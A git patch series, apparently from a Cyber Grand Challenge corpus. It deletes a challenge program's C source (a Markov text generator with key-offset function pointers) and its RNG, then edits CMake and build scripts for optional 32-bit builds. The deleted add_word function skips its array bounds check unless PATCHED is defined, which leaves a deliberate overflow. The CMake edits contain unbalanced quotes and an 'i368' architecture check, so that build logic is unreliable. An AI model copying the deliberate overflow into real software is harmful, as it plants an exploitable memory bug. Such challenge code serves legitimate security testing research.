else - return node->value; -} - -static uintptr_t cgc_my_htbl_set(htbl_t *tbl, const char *key, uintptr_t value) -{ - htbl_node_t *node = find_node(tbl, key); - if (node == NULL) - { - uintptr_t hash; - if (tbl->count * 2 >= tbl->size) - CALL(HTBL_ENLARGE, tbl); - - if (tbl->nodes == NULL) - return NULL; - - node = cgc_malloc(sizeof(htbl_node_t)); - if (node == NULL) - return NULL; - - node->key = CALL(STRDUP, key); - if (node->key == NULL) - { - cgc_free(node); - return NULL; - } - node->value = value; - - hash = CALL(HASH_STRING, key, tbl->size); - node->next = tbl->nodes[hash]; - node->prev = NULL; - if (node->next) - node->next->prev = node; - tbl->nodes[hash] = node; - tbl->count++; - return NULL; - } - else - { - uintptr_t retval = node->value; - node->value = value; - return retval; - } -} - -static void cgc_my_htbl_free(htbl_t *tbl, uintptr_t free_value) -{ - cgc_size_t i; - - for (i = 0; i < tbl->size; i++) - { - htbl_node_t *node, *next_node; - for (node = tbl->nodes[i]; node != NULL; node = next_node) - { - next_node = node->next; - CALL(free_value, node->value); - CALL(FREE, node); - } - } - - CALL(FREE, tbl->nodes); - tbl->nodes = NULL; - tbl->size = 0; - tbl->count = 0; -} - -static char *cgc_my_strdup(const char *s) -{ - cgc_size_t length = CALL(STRLEN, s); - char *str = CALL(CALLOC, length + 1, 1); - if (str == NULL) - return NULL; - CALL(STRCPY, str, s); - return str; -} - -static intptr_t cgc_my_strlen(const char *s) -{ - cgc_size_t i; - for (i = 0; s[i] != 0; i++) ; - return i; -} - -static void cgc_my_strncpy(char * dest, const char * src, intptr_t len) -{ - cgc_size_t i; - for (i = 0; i < len; i++) - { - dest[i] = src[i]; - if (src[i] == 0) - break; - } -} - -static intptr_t cgc_my_strncmp(char * a, char * b, intptr_t len) -{ - cgc_size_t i; - for (i = 0; i < len && a[i] != 0 && b[i] != 0; i++) - { - int result = CALL(BYTECMP, a[i], b[i]); - if (result != 0) - return result; - } - - if (i == len) - return 0; - - return CALL(BYTECMP, a[i], b[i]); -} - -static intptr_t cgc_my_strcmp(char * a, char * b) -{ - cgc_size_t i; - for (i = 0; a[i] != 0 && b[i] != 0; i++) - { - int result = CALL(BYTECMP, a[i], b[i]); - if (result != 0) - return result; - } - - return CALL(BYTECMP, a[i], b[i]); -} - -static intptr_t cgc_my_bytecmp(intptr_t a, intptr_t b) -{ - return a - b; -} - -static intptr_t cgc_my_search_words(const char *needle, int partial) -{ - int len = CALL(STRLEN, needle); - cgc_size_t i; - uintptr_t f = partial ? STRNCMP : STRCMP; - for (i = 0; words[i] != NULL; i++) - if (CALL(f, needle, words[i], len) == 0) - return i; - - return -1; -} - -static void cgc_my_sort_words(uintptr_t comparator, intptr_t reverse) -{ - int done; - cgc_size_t i; - - do { - done = 1; - for (i = 1; words[i] != NULL; i++) - { - int result = CALL(comparator, words[i-1], words[i]); - if ((!reverse && result > 0) || (reverse && result < 0)) - { - const char *tmp = words[i]; - words[i] = words[i-1]; - words[i-1] = tmp; - done = 0; - } - } - } while (!done); -} - -static intptr_t cgc_my_verify_word(const char *word) -{ - int len = CALL(STRLEN, word), i; - - // check that it contains a non-trivial root word - for (i = 0; i < len - 3; i++) - { - char root[4]; - CALL(STRNCPY, root, word, 3); - root[3] = 0; - - if ((intptr_t)CALL(SEARCH_WORDS, root, 1) >= 0) - break; - } - if (i == len - 3) - return 0; - - // check that word doesn't already exist - if ((intptr_t)CALL(SEARCH_WORDS, word, 0) >= 0) - return 0; - - return 1; -} - -static intptr_t cgc_my_add_word(const char *word) -{ - cgc_size_t i; - if (CALL(VERIFY_WORD, word) == 0) - return 0; - - for (i = 0; words[i] != NULL; i++) ; - -#ifdef PATCHED - if (i >= sizeof(words) / sizeof(words[0])) - return 0; -#endif - - words[i] = CALL(STRDUP, word); - words[i+1] = NULL; - return 1; -} - -static const char *cgc_my_random_dict_word() -{ - cgc_size_t i, r; - for (i = 0; words[i] != NULL; i++) ; - r = CALL(RANDINT, 0, i); - return words[r]; -} - -uint32_t cgc_tornado(); -static uintptr_t cgc_my_randint(uintptr_t min, uintptr_t max) -{ - cgc_size_t bytes; - uintptr_t rand, range = max - min; - - int fd; -try_again: -#if 0 - if (cgc_random(&rand, sizeof(rand), &bytes) != 0 || bytes != sizeof(rand)) - return min; -#endif - rand = cgc_tornado(); - - uintptr_t q = UINTPTR_MAX - (UINTPTR_MAX % range); - if (rand >= q) - goto try_again; - - return min + (rand % range); -} - -static const char *cgc_my_random_word(htbl_t *tbl, uintptr_t cur_length) -{ - cgc_size_t count = 0; - uintptr_t rand; - htbl_iter_t iter; - - for (CALL(HTBL_FIRST, tbl, &iter); iter.cur != NULL; CALL(HTBL_NEXT, tbl, &iter)) - count += iter.cur->value; - - if (count == 0) - return NULL; - - rand = CALL(RANDINT, 0, count); - for (CALL(HTBL_FIRST, tbl, &iter); iter.cur != NULL; CALL(HTBL_NEXT, tbl, &iter)) - { - if (rand < iter.cur->value) - break; - rand -= iter.cur->value; - } - - // end the sentence if possible and cur_length is large - if (CALL(HTBL_GET, tbl, "") != 0) - { - rand = CALL(RANDINT, 0, 10); - if (cur_length >= 30) - { - if (rand >= 3) - return ""; - } - else if (cur_length >= 20) - { - if (rand >= 5) - return ""; - } - else - { - if (rand >= 9) - return ""; - } - } - - return iter.cur->key; -} - -static char *cgc_my_generate_text(htbl_t *tbl, int training) -{ - const char *prev = "", *word, *outword; - char tmp[128]; - cgc_size_t i = 0; - uintptr_t len; - - do { - word = CALL(RANDOM_WORD, CALL(HTBL_GET, tbl, prev), i); - if (word == NULL) - return NULL; - - if (!training || CALL(RANDINT, 0, 10) != 0) - outword = word; - else - outword = CALL(RANDOM_DICT_WORD, 0); - - len = CALL(STRLEN, outword); - if (i + len + 5 >= sizeof(tmp)) - break; - - if (i == 0) - { - CALL(MEMCPY, &tmp[i], outword, len); - tmp[i] &= ~0x20; // make upper case - } - else - { - if (CALL(STRCMP, outword, "s") == 0) - tmp[i++] = '\''; - else if (CALL(STRCMP, outword, "") != 0) - tmp[i++] = ' '; - CALL(MEMCPY, &tmp[i], outword, len); - } - - prev = word; - i += len; - } while (CALL(STRCMP, prev, "") != 0); - - if (i + len + 5 >= sizeof(tmp)) - { - tmp[i++] = '.'; - tmp[i++] = '.'; - tmp[i++] = '.'; - } - else - { - tmp[i++] = '.'; - } - tmp[i++] = 0; - return CALL(STRDUP, tmp); -} - -static void cgc_my_analyze_text(htbl_t *tbl, const char *text) -{ - char word[64], prev[64]; - uintptr_t next_tbl; - const char *s; - - prev[0] = 0; - for (s = text; *s != 0; ) - { - const char *start, *end; - int has_period = 0; - - while (*s != 0 && CALL(IS_ALPHA, *s) == 0) - s++; - if (*s == 0) break; - - start = s; - while (*s != 0 && CALL(IS_ALPHA, *s) != 0) - s++; - end = s; - - if (end-start >= sizeof(word)) - continue; - - while (*s != 0 && CALL(IS_ALPHA, *s) == 0) - { - if (*s++ == '.') - { - has_period = 1; - break; - } - } - - CALL(MEMCPY, word, start, end-start); - word[end-start] = 0; - CALL(TO_LOWER, word); - -add_next_word: - next_tbl = CALL(HTBL_GET, tbl, prev); - if (next_tbl == 0) - { - next_tbl = CALL(CALLOC, 1, sizeof(htbl_t)); - if (next_tbl == 0) - continue; - CALL(HTBL_INIT, next_tbl, 8); - CALL(HTBL_SET, tbl, prev, next_tbl); - } - CALL(HTBL_SET, next_tbl, word, CALL(HTBL_GET, next_tbl, word) + 1); - - CALL(STRCPY, prev, word); - if (has_period) - { - has_period = 0; - word[0] = 0; - goto add_next_word; - } - } - - if (word[0] != 0) - { - word[0] = 0; - next_tbl = CALL(HTBL_GET, tbl, prev); - if (next_tbl == 0) - { - next_tbl = CALL(CALLOC, 1, sizeof(htbl_t)); - if (next_tbl == 0) - return; - CALL(HTBL_INIT, next_tbl, 8); - CALL(HTBL_SET, tbl, prev, next_tbl); - } - CALL(HTBL_SET, next_tbl, word, CALL(HTBL_GET, next_tbl, word) + 1); - } -} - -static void cgc_my_write_error(uintptr_t value) -{ - CALL(WRITE_UINT, value); -} - -static void cgc_my_write_uint(uintptr_t value) -{ - uint8_t tmp[sizeof(value) + 1]; - int to_send; - cgc_size_t bytes; - - if (value < 0x80) - { - tmp[0] = value; - to_send = 1; - } - else if (value < 0x7F00) - { - tmp[0] = 0x80 | (value >> 8); - tmp[1] = value; - to_send = 2; - } - else - { - tmp[0] = 0xFF; - *(uintptr_t *)&tmp[1] = value; - to_send = 1 + sizeof(uintptr_t); - } - - cgc_transmit(STDOUT, tmp, to_send, &bytes); -} - -static void cgc_my_write_string(const char *s) -{ - uintptr_t len = CALL(STRLEN, s); - cgc_size_t bytes; - CALL(WRITE_UINT, len); - cgc_transmit(STDOUT, s, len, &bytes); -} - -static uintptr_t cgc_my_read_all(char *buf, uintptr_t len) -{ - cgc_size_t bytes; - while (len > 0) - { - if (cgc_receive(STDIN, buf, len, &bytes) != 0 || bytes == 0) - return 0; - buf += bytes; - len -= bytes; - } - return 1; -} - -static intptr_t cgc_my_read_uint(uintptr_t *pvalue) -{ - uintptr_t value; - uint8_t byte; - if (!CALL(READ_ALL, &byte, 1)) - return 0; - - if (byte < 0x80) - { - value = byte; - } - else if (byte < 0xFF) - { - uint8_t byte2; - if (!CALL(READ_ALL, &byte2, 1)) - return 0; - value = ((byte & 0x7F) << 8) | byte2; - } - else - { - if (!CALL(READ_ALL, &value, sizeof(value))) - return 0; - } - - *pvalue = value; - return 1; -} - -static intptr_t cgc_my_read(char *buf, intptr_t max) -{ - uintptr_t rlen; - - if (!CALL(READ_UINT, &rlen)) - return -1; - - if (rlen > max) - return -1; - - if (!CALL(READ_ALL, buf, rlen)) - return -1; - - return rlen; -} - -static intptr_t cgc_my_read_string(char *buf, intptr_t max) -{ - intptr_t actual; - if (max == 0) - return 0; - actual = CALL(READ, buf, max-1); - if (actual < 0) - return actual; - buf[actual] = 0; - return actual; -} - -static void cgc_my_protect(uintptr_t new_key) -{ - cgc_size_t i; - for (i = 0; i < FUNCS_END; i++) - *(uintptr_t *)(&funcs[i]) += new_key - secret_key; - secret_key = new_key; -} - -static void cgc_my_init() -{ - secret_key = STATIC_SECRET_KEY; -} - -int main(int cgc_argc, char *cgc_argv[]) -{ - uintptr_t cmd, value; - char buf[32], *tmp; - htbl_t tbl; - - CALL(INIT, 0); - CALL(PROTECT, 0xDEADBEEF); - - CALL(HTBL_INIT, &tbl, 128); - CALL(ANALYZE_TEXT, &tbl, cgc_text); - - while (1) - { - if (!CALL(READ_UINT, &cmd)) - break; - - if (cmd == CMD_QUIT) - { - CALL(WRITE_ERROR, ERROR_OK); - break; - } - - switch (cmd) - { - case CMD_REPROTECT: - if (CALL(READ_UINT, &value)) - { - CALL(PROTECT, value); - CALL(WRITE_ERROR, ERROR_OK); - } - else - { - CALL(WRITE_ERROR, ERROR_INVAL); - } - break; - case CMD_ADD_WORD: - if ((intptr_t)CALL(READ_STRING, buf, sizeof(buf)) >= 0) - { - if (CALL(ADD_WORD, buf)) - CALL(WRITE_ERROR, ERROR_OK); - else - CALL(WRITE_ERROR, ERROR_INVAL); - } - else - { - CALL(WRITE_ERROR, ERROR_INVAL); - } - break; - case CMD_SORT_WORDS: - if (CALL(READ_UINT, &value)) - { - CALL(SORT_WORDS, STRCMP, value); - CALL(WRITE_ERROR, ERROR_OK); - } - else - { - CALL(WRITE_ERROR, ERROR_INVAL); - } - break; - case CMD_SEARCH_PARTIAL: - case CMD_SEARCH_WORD: - if ((intptr_t)CALL(READ_STRING, buf, sizeof(buf)) >= 0) - { - intptr_t idx = CALL(SEARCH_WORDS, buf, cmd == CMD_SEARCH_PARTIAL); - if (idx < 0) - { - CALL(WRITE_ERROR, ERROR_NOTFOUND); - } - else - { - CALL(WRITE_ERROR, ERROR_OK); - CALL(WRITE_UINT, (uintptr_t)idx); - } - } - else - { - CALL(WRITE_ERROR, ERROR_INVAL); - } - break; - case CMD_GENERATE_TEXT: - tmp = CALL(GENERATE_TEXT, &tbl, 0); - if (tmp != NULL) - { - CALL(WRITE_ERROR, ERROR_OK); - CALL(WRITE_STRING, tmp); - CALL(FREE, tmp); - } - else - { - CALL(WRITE_ERROR, ERROR_NOMEM); - } - break; - case CMD_TRAINING: - tmp = NULL; - do { - CALL(FREE, tmp); - tmp = CALL(GENERATE_TEXT, &tbl, 1); - if (tmp == NULL) - break; - } while (CALL(STRLEN, tmp) < 3 || tmp[CALL(STRLEN, tmp)-2] == '.'); - if (tmp != NULL) - { - uintptr_t add_text = 0; - CALL(WRITE_ERROR, ERROR_OK); - CALL(WRITE_STRING, tmp); - if (CALL(READ_UINT, &add_text) && add_text) - CALL(ANALYZE_TEXT, &tbl, tmp); - CALL(FREE, tmp); - CALL(WRITE_ERROR, ERROR_OK); - } - else - { - CALL(WRITE_ERROR, ERROR_NOMEM); - } - break; - default: - /* ignore invalid commands */ - break; - } - } - - return 0; -} - -funptr_t funcs[] = { - [INIT] = (funptr_t) cgc_my_init, -#define REGISTER(x, y) [x] = (funptr_t) ((uintptr_t)(y) + STATIC_SECRET_KEY) - REGISTER(PROTECT, cgc_my_protect), - REGISTER(STRLEN, cgc_my_strlen), - REGISTER(STRNCMP, cgc_my_strncmp), - REGISTER(STRCMP, cgc_my_strcmp), - REGISTER(STRCPY, cgc_my_strcpy), - REGISTER(MEMCPY, cgc_my_memcpy), - REGISTER(BYTECMP, cgc_my_bytecmp), - REGISTER(SEARCH_WORDS, cgc_my_search_words), - REGISTER(SORT_WORDS, cgc_my_sort_words), - REGISTER(ADD_WORD, cgc_my_add_word), - REGISTER(VERIFY_WORD, cgc_my_verify_word), - REGISTER(RANDOM_DICT_WORD, cgc_my_random_dict_word), - REGISTER(ANALYZE_TEXT, cgc_my_analyze_text), - REGISTER(GENERATE_TEXT, cgc_my_generate_text), - REGISTER(STRNCPY, cgc_my_strncpy), - REGISTER(PRINTF, cgc_fdprintf), - REGISTER(STRDUP, cgc_my_strdup), - REGISTER(CALLOC, cgc_calloc), - REGISTER(FREE, cgc_free), - REGISTER(HASH_STRING, cgc_my_hash_string), - REGISTER(HTBL_INIT, cgc_my_htbl_init), - REGISTER(HTBL_ENLARGE, cgc_my_htbl_enlarge), - REGISTER(HTBL_GET, cgc_my_htbl_get), - REGISTER(HTBL_SET, cgc_my_htbl_set), - REGISTER(HTBL_FREE, cgc_my_htbl_free), - REGISTER(HTBL_FIRST, cgc_my_htbl_first), - REGISTER(HTBL_NEXT, cgc_my_htbl_next), - REGISTER(IS_ALPHA, cgc_isalpha), - REGISTER(TO_LOWER, cgc_my_to_lower), - REGISTER(RANDOM_WORD, cgc_my_random_word), - REGISTER(RANDINT, cgc_my_randint), - REGISTER(READ_ALL, cgc_my_read_all), - REGISTER(READ_UINT, cgc_my_read_uint), - REGISTER(READ, cgc_my_read), - REGISTER(READ_STRING, cgc_my_read_string), - REGISTER(WRITE_UINT, cgc_my_write_uint), - REGISTER(WRITE_ERROR, cgc_my_write_error), - REGISTER(WRITE_STRING, cgc_my_write_string) -}; diff --git a/challenges/FUN/src/tornado.c b/challenges/FUN/src/tornado.c deleted file mode 100644 index e70429e95..000000000 --- a/challenges/FUN/src/tornado.c +++ /dev/null @@ -1,115 +0,0 @@ -/* - * Copyright (c) 2015 Kaprica Security, Inc. - * - * Permission is hereby granted, free of charge, to any person obtaining a copy - * of this software and associated documentation files (the "Software"), to deal - * in the Software without restriction, including without limitation the rights - * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell - * copies of the Software, and to permit persons to whom the Software is - * furnished to do so, subject to the following conditions: - * - * The above copyright notice and this permission notice shall be included in - * all copies or substantial portions of the Software. - * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, - * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN - * THE SOFTWARE. - * - */ -#include "cgc_stdint.h" - -#define M 122 -#define N 156 - -/* from gcc headers */ -typedef long long _m128i __attribute__((__vector_size__(16))); -inline _m128i _mm_slli_si128(_m128i a, uint8_t b) { - __asm__ volatile ( "pslldq %1, %0" : "+x" (a) : "i" (b) ); - return a; -} - -inline _m128i _mm_srli_si128(_m128i a, uint8_t b) { - __asm__ volatile ( "psrldq %1, %0" : "+x" (a) : "i" (b) ); - return a; -} - -inline _m128i _mm_slli_epi32(_m128i a, uint8_t b) { - __asm__ volatile ( "pslld %1, %0" : "+x" (a) : "i" (b) ); - return a; -} - -inline _m128i _mm_srli_epi32(_m128i a, uint8_t b) { - __asm__ volatile ( "psrld %1, %0" : "+x" (a) : "i" (b) ); - return a; -} - - -static int initialized = 0; -static int available_bytes; -static unsigned idx; -static _m128i W[N]; -const static _m128i MASK = {0xBFFFFFF6BFFAFFFF, 0xDDFECB7FDFFFFFEF}; - -void cgc_tornado_mix() -{ - int i; - _m128i g, wA, wB, wC, wD, tmp; - - // generate g - wA = W[idx]; - wB = W[(idx + M) % N]; - wC = W[(idx + N-2) % N]; - wD = W[(idx + N-1) % N]; - - wA = _mm_slli_si128(wA, 1) ^ wA; - wB = _mm_srli_epi32(wB, 11) & MASK; - wC = _mm_srli_si128(wC, 1); - wD = _mm_slli_epi32(wD, 18); - - g = W[idx] ^ wA ^ wB ^ wC ^ wD; - - // shift in g - W[0] = g; - idx = (idx + 1) % N; - - available_bytes = N * 4; -} - -void cgc_tornado_init() -{ - int i; - uint32_t seed = 0x12345678; - uint32_t *W32 = (uint32_t *)W; - - initialized = 1; - available_bytes = 0; - idx = 0; - - for (i = 0; i < N * 4; i++) - { - seed *= 0xdeadbeef; - seed += 0xabcdef1c; - W32[i] = seed; - } - - for (i = 0; i < 1000; i++) - cgc_tornado_mix(); -} - -uint32_t cgc_tornado() -{ - uint32_t result; - if (!initialized) - cgc_tornado_init(); - - if (available_bytes < sizeof(uint32_t)) - cgc_tornado_mix(); - - result = *(uint32_t *)W + N * 4 - available_bytes/4; - available_bytes -= sizeof(uint32_t); - return result; -} From dc649ddcd004aa8c1dc555891f16f2225f5245ce Mon Sep 17 00:00:00 2001 From: dns43 Date: Sat, 19 Oct 2019 00:58:42 +0000 Subject: [PATCH 5/6] making 32bit optional --- CMakeLists.txt | 6 ++++++ build.sh | 6 ++++++ 2 files changed, 12 insertions(+) diff --git a/CMakeLists.txt b/CMakeLists.txt index 3ff1fdab6..964c239a5 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -60,6 +60,12 @@ else(WIN32) #-m32 ) + #if(NOT ARCH=64) + # add_compile_options( + # -m32 + # ) + #endif() + # Link everything 32-bit (until we have a 64-bit option) set(CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} ")#-m32") set(CMAKE_SHARED_LINKER_FLAGS "${CMAKE_SHARED_LINKER_FLAGS} ") #-m32") diff --git a/build.sh b/build.sh index af75eb12f..e4348e1a7 100755 --- a/build.sh +++ b/build.sh @@ -34,6 +34,10 @@ case $LINK in STATIC) CMAKE_OPTS="$CMAKE_OPTS -DBUILD_SHARED_LIBS=OFF -DBUILD_STATIC_LIBS=ON";; esac +#if [[ "$(uname -p)" == "x86_64" ]]; then +# CMAKE_OPTS="$CMAKE_OPTS -DARCH=64"; +#fii + # Prefer ninja over make, if it is available #if which ninja 2>&1 >/dev/null; then # CMAKE_OPTS="-G Ninja $CMAKE_OPTS" @@ -43,6 +47,8 @@ esac BUILD_FLAGS= #fi + + cmake $CMAKE_OPTS .. cmake --build . $BUILD_FLAGS From 511706145eedd449f7357b1c5529acd3342fafde Mon Sep 17 00:00:00 2001 From: dns43 Date: Tue, 22 Oct 2019 20:27:25 +0000 Subject: [PATCH 6/6] 32bit optional (automatic) --- CMakeLists.txt | 19 ++++++++++--------- 1 file changed, 10 insertions(+), 9 deletions(-) diff --git a/CMakeLists.txt b/CMakeLists.txt index 964c239a5..502430f05 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -57,18 +57,19 @@ else(WIN32) -fno-builtin -w -g3 - #-m32 ) - #if(NOT ARCH=64) - # add_compile_options( - # -m32 - # ) - #endif() + # It's 2019 so we compile and link everything 64-bit, unless the host architecture is i368 + set(CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} ")") + set(CMAKE_SHARED_LINKER_FLAGS "${CMAKE_SHARED_LINKER_FLAGS} ") ") - # Link everything 32-bit (until we have a 64-bit option) - set(CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} ")#-m32") - set(CMAKE_SHARED_LINKER_FLAGS "${CMAKE_SHARED_LINKER_FLAGS} ") #-m32") + EXECUTE_PROCESS( COMMAND uname -m '\n' OUTPUT_VARIABLE ARCHITECTURE ) + message( STATUS "Architecture: ${ARCHITECTURE}" ) + if( ${ARCHITECTURE} MATCHES "i368") + add_compile_options(-m32) + set(CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} -m32") + set(CMAKE_SHARED_LINKER_FLAGS "${CMAKE_SHARED_LINKER_FLAGS} -m32") + endif() # Linker options # Dynamic by default